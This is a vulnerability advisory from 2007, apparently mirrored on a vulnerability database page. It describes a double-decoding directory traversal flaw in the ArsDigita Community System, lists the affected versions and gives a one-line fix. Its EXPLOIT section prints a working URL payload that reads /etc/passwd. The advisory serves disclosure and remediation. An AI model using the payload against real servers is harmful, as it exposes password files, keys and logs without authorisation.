Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

arsdigita-traverse.txt

🗓️ 20 Jan 2007 00:00:00Reported by Elliot KendallType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

A directory traversal vulnerability exists in Ars Digita Community System, allowing remote attackers to read sensitive files, including passwords and SSL certificates

Code
`SUMMARY  
=======  
  
A directory traversal vulnerability exists in the Ars Digita Community  
System. A remote attacker could exploit this vulnerability to read  
arbitrary files with the permissions of the web server.  
  
AFFECTED SOFTWARE  
=================  
  
* Ars Digita Community System (ACS) 3.4.9, 3.4.10, and probably earlier  
versions  
  
* Ars Digita Community Education Solution (ACES) 1.1  
  
UNAFFECTED  
==========  
  
* OpenACS all versions  
  
* Ars Digita Community System (ACS) 4.2  
  
* ACS-Java 3.4, 4.0, 4.7.4  
  
IMPACT  
======  
  
A remote attacker could exploit this vulnerability to read sensitive  
files on the affected system. Possible targets could include files  
containing passwords, private keys for SSL certificates, and web server  
logs.  
  
DETAILS  
=======  
  
RFC2396 permits the use of escaped characters in a URI string,  
consisting of a percent sign followed by two hexadecimal digits  
corresponding to the ASCII value of the character. For example, a space  
would be encoded as %20.  
  
The unencoding of these values is typically handled by the web server.  
Affected versions of ACS perform their own decoding operation after  
that done by the web server, so that URIs containing %25, the encoded  
form of the percent character, are decoded twice.  
  
Web servers traditionally also perform sanity checks on URLs to prevent  
them from accessing files in the directory tree outside of the web  
server's configured root directory. One of the most common restricted  
sequences is "../", which refers to the parent directory of the current  
working directory.  
  
Because the second URI decoding that ACS performs occurs after the  
sanity checks done by the web server, encoded forms of "../" are not  
properly escaped, leading to the possibility of URIs that access files  
outside of the web server's root directory.  
  
SOLUTION  
========  
  
In the request-processor-procs.tcl file, replace the line  
  
set url [ns_urldecode [ns_conn url]]  
  
with  
  
set url [ns_conn url]  
  
EXPLOIT  
=======  
  
This example will retrieve the UNIX password file from a vulnerable  
host with a web root fewer than 8 directories deep from the root  
directory.  
  
http://target.tld/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd  
  
ACKNOWLEDGMENTS  
===============  
  
Thanks to Eve Andersson for finding the source of the bug in the  
application code and providing a fix.  
  
Thanks to the OpenACS development team for helping confirm their  
software is not vulnerable.  
  
--   
Elliot Kendall <[email protected]>  
Network Security Engineer  
Brandeis University  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
directory traversalremote attacksensitive filesweb servervulnerabilityuri decodingexploit
29